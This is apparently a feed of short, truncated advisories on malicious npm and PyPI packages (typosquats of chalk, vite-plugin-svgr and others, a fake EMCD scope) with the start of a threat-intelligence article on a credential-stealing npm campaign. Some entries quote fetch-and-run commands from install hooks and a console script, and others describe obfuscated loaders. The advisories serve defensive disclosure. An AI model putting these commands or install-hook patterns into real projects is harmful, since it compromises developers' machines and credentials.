MAL-2026-5709 Malicious code in chalk-plus-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f5351482f03a50cab8a28b6aa7c992c960a55c6889634d2a04bb86a157ac18d1 Package is published under a name riding the popular chalk color-output library but its source tree, README, main entry lib/nodemailer.js, and lib...

Malicious code in chalk-pro (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce Package is published as 'chalk-pro' homepage chalk-pro.com but its main entry is a verbatim copy of nodemailer's API — a typosquat impersonating both...

MAL-2026-5711 Malicious code in chalk-pro (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce Package is published as 'chalk-pro' homepage chalk-pro.com but its main entry is a verbatim copy of nodemailer's API — a typosquat impersonating both...

MAL-2026-5708 Malicious code in vite-svgr (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5 Package name vite-svgr impersonates the popular vite-plugin-svgr, but the shipped code is a fork of tsconfig-paths package.json description: 'Load no...

MAL-2026-5705 Malicious code in theta-connector (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f9ac14206b12d7cb0c180c49e65d91b99aa2f013c33147d7f1eff396da2c48a2 The package advertises itself as a MySQL connector but index.js around line 236 contains a method queryDBConnect on the exported...

Malicious code in sn-internal-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...

Malicious code in cache-section-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cad3d2732831e4b798073aff289abd1abdbb718b4caa9e4f970a0dd3f7733653 package.json declares a postinstall hook node -e "require'./loader.js'" that runs automatically on every npm install. loader.js hex-decodes the strin...

MAL-2026-5604 Malicious code in cache-section-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cad3d2732831e4b798073aff289abd1abdbb718b4caa9e4f970a0dd3f7733653 package.json declares a postinstall hook node -e "require'./loader.js'" that runs automatically on every npm install. loader.js hex-decodes the strin...

Malicious code in js-crypto-promise (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a9d677e45bee46911d04564e9260f4b569119a4ca0a13a58bcd43760359fbb4f The package's prepinstall.js script base64-decodes a hidden URL stored in a constant misleadingly named HASHKEY decoding to...

Malicious code in hex-type (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f7d0271fe97ea66e9ff2ba3a0ea225364324f28138af32c337d6ed8b2b99e5ad Package metadata description "A universally-unique, lexicographically-sortable, identifier generator", homepage github.com/ulid/javascript, build...

MAL-2026-5538 Malicious code in hex-type (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f7d0271fe97ea66e9ff2ba3a0ea225364324f28138af32c337d6ed8b2b99e5ad Package metadata description "A universally-unique, lexicographically-sortable, identifier generator", homepage github.com/ulid/javascript, build...

Malicious code in check-error-util (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7c25cbbb904c18028cac363ba66eb89d91301bd3204a8347834e52387b4b575e On require/import, index.js executes a top-level resolveConfig that reconstructs a URL from an XOR-obfuscated integer array, AES-256-CBC-decrypts it,...

MAL-2026-5527 Malicious code in check-error-util (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7c25cbbb904c18028cac363ba66eb89d91301bd3204a8347834e52387b4b575e On require/import, index.js executes a top-level resolveConfig that reconstructs a URL from an XOR-obfuscated integer array, AES-256-CBC-decrypts it,...

Malicious code in db-xorma (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1428486c71a3cd7d89ea90a17631bb5dc0fee7e11a6cbb4d8029a8b25268c7d2 db-xorma advertises itself as a reactive in-memory database library. When a consumer creates any Model instance the documented entry point, the...

Malicious code in @sql-trigger/nodesql (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 39e37d95fb040c83277583e2bf90b56363f86360337f1c30e63c85eb56579ada The package advertises itself as a simple SQL helper but its main entry index.js is heavily obfuscated obfuscator.io string-array + RC4 + base64,...

Preinstall to persistence: Inside the Red Hat npm Miasma credential-stealing campaign

In this article 1. Attack chain overview 2. Mitigation and protection guidance 3. Learn more Microsoft Threat Intelligence identified a large-scale npm supply chain attack affecting 32 maliciously modified packages across more than 90 versions under the @redhat-cloud-services npm scope. The...

Malicious code in @emcd-vue/auth (npm)

Part of a coordinated multi-package supply-chain attack impersonating EMCD emcd.io, a legitimate Russian cryptocurrency exchange and mining pool. The attacker registered the @emcd-vue npm scope to pose as an internal Vue.js front-end tooling package from "EMCD Platform Engineering." The package...

MAL-2026-5163 Malicious code in @emcd-vue/auth (npm)

Part of a coordinated multi-package supply-chain attack impersonating EMCD emcd.io, a legitimate Russian cryptocurrency exchange and mining pool. The attacker registered the @emcd-vue npm scope to pose as an internal Vue.js front-end tooling package from "EMCD Platform Engineering." The package...

MAL-2026-5164 Malicious code in @emcd-vue/b2b-pay-form (npm)

Part of a coordinated multi-package supply-chain attack impersonating EMCD emcd.io, a legitimate Russian cryptocurrency exchange and mining pool. The attacker registered the @emcd-vue npm scope to distribute multiple malicious packages posing as internal tooling under the "EMCD Platform...

MAL-2026-4812 Malicious code in m-at-star-tools (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2 The package's sole consolescript m0scan m0scan/main.py:6-7 executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque...